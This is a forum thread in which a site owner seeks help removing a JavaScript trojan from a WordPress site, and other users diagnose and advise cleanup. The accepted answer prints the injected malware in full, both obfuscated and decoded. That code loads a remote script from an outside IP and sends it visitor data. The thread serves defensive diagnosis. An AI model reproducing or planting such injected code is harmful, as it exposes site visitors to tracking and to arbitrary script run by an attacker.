JS:Redirector-NL [Trj] - How to remove this trojan?

Question

I have this "JS:Redirector-NL [Trj]" virus issue in my website http://nutriconsulting.com.br/ , when someone opens the web , avast antivirus displays a popup which shows this error

Infection Details URL: http://nutriconsulting.com.br/wp-content... Process: C:\Users\Cyber Solutions\AppData\Local\G... Infection: JS:Redirector-NL [Trj]

I scanned my c panel files twice but all files are clean there , so how'd i remove it ?? This Trojan is running in java script files , i will really appreciate if someone gives me the idea of how to looking for a malicious codes in java script ..

Again this domain only displays an error in avast antivirus , not shown in other antiviruses like Symantec or Norton antivirus so please check it on avast . Please help me to fix up this issue , i am looking for some quick response .

Thanks

Yes it displays different error in Symantec , but how can i fix it . Any help?? — leito cancer, Apr 10 '12 at 06:27
well your site is sending info to 91.196.216.64 ... check your js, there has to be something that is not supposed to be there — Milan Halada, Apr 10 '12 at 06:30
Ok you mean this IP "91.196.216.64" is in java script files ?? so i need to simply remove it , i will really appreciate if you checked java script files for me . Can i share java script codes here or send you the link for download the infected files . — leito cancer, Apr 10 '12 at 06:33
Java script files didn't have virus in them , but i think they runs script which will redirected my web to the ip , you've mentioned . — leito cancer, Apr 10 '12 at 06:34
it can be obfuscated, i would just delete js on the site and upload it again from backup. Im not an expert in this, an i do not believe i would be able to find it inside your js — Milan Halada, Apr 10 '12 at 06:37
The problem is i didn't have the backup , but want to clean it as soon as possible . Any other suggestion , because if i delete js files then it may stop other functions of the web . thank you — leito cancer, Apr 10 '12 at 06:49

score 2 · Accepted Answer · answered Apr 10 '12 at 06:36

Have a look at: http://nutriconsulting.com.br/wp-includes/js/l10n.js?ver=20101110

There it is:

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

and in decoded form:

element = document.getElementById('dgllhguk');
if (!element) {
    hghjghjhjgjh = document.location;
    hghjhjhjg = escape(document.referrer);
    ugkkjkj = escape(navigator.userAgent);
    var js = document.createElement('script');
    js.id = 'dgllhguk';
    js.src = 'http://91.196.216.64/s.php?ref=' + hghjhjhjg + '&lc=' + hghjghjhjgjh + '&ua=' + ugkkjkj;
    var head = document.getElementsByTagName('head')[0];
    head.appendChild(js)
}];head.appendChild(js)}

The one who is controlling 91.196.216.64 (Russian Federation / ISP: SpetsEnergo Ltd.) can execute arbitary js code on your site.

Thanks for the help stewe, but it's in other java script files too , so can i looking for the same code in others??? — leito cancer, Apr 10 '12 at 06:46
I would recommend changing all passwords, and you should restore the original files. Also make sure to always use the latest version of wordpress. — stewe, Apr 10 '12 at 06:57
Yes i understand it , but the problem is i didn't have the backup of website right now. Just need your help to clean up these java script files , didn't know any other way . Please help me to fix up this issue , the codes you decoded are really helpful . So what'd i supposed to do ?? can i simply find & remove this code from other infected java script files? — leito cancer, Apr 10 '12 at 07:04
Be aware that removing the code may help for now but it is very important to find the reason why the infection happend in the first place. Maybe it is an outdated version of wordpress or some other code that has a security hole which need to be fixed. — stewe, Apr 10 '12 at 07:33

JS:Redirector-NL [Trj] - How to remove this trojan?

1 Answers1